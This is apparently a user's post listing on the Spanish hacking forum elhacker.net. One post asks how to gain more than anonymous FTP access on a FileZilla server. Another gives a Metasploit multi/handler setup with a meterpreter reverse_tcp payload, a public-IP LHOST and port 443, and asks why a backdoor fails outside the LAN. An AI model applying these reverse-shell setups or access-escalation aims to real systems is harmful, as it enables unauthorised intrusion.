elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Temas
Páginas: [1]
1  Foros Generales / Dudas Generales / Logged on (Anonymous) = Permission denied ¿Solución? en: 6 Enero 2018, 23:38 pm
Hola, estaba testeando algunas cosas y me conecte por ftp a una ip que utiliza filezilla. En un intento por loguearme coloco Anonymous y las pass en blanco, pero no me deja hacer nada ¿qué podría hacer en estos casos para lograr permisos?
https://i.imgur.com/ZEJizyV.jpg

2  Foros Generales / Foro Libre / Lab0$$ | Grupo orientado a aprender y mejorar en el hacking. en: 6 Enero 2018, 02:18 am
Hola a todos. Hago este post, porque quería formar un grupo donde aprendamos entre todos y compartamos lo que vamos aprendiendo para mejorar en el mundo del hacking y darnos a conocer.
Si les interesa, mi skype es Bloqueado    Agreguenme y vemos, de paso les doy mas info.
3  Foros Generales / Dudas Generales / Backdoor dejó de funcionar (cuando intento fuera de LAN) en: 1 Enero 2018, 20:13 pm
Bueno primero que nada hola a todos, soy nuevo en este foro y se que no es la mejor manera de empezar, pero tengo un problema.
Resulta que estaba testeando con backdoors, dentro de LAN salía todo bien, con setoolkit y TheFatRat he hecho los mismos, y con metasploit ponía a la escucha.
Pero cuando intento exactamente lo mismo, pero fuera de una red lan al ejecutar el virus en el pc victima me sale "dejó de funcionar" y por ende nunca llega una conexión a mi metasploit.

Si necesitan saber como configuré todo primero a la hora de crear el backdoor usé:
LHOST: ip publica
LPORT: 443 (abrí los puertos del mismo en la pagina de mi moden colocando la ip de kali)

en msfconsole o metasploit usé:
multi/handler ----> windows/meterpreter/reverse_tcp
LHOST: ip del kali (también probé con la pública pero seguía el error)
LPORT: 443
exploit

Hasta ahí funciona solo con la ip privada, si coloco la ip publica ya me tira que no encontró la ip o parecido.

Y  como dije, abro el virus en la pc victima (la mía que está virtualizando el kali) y me da ese error. Quisiera que me ayuden a solucionarlo, tengo el vmware en NAT no sé si tendrá que ver. Gracias.


Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines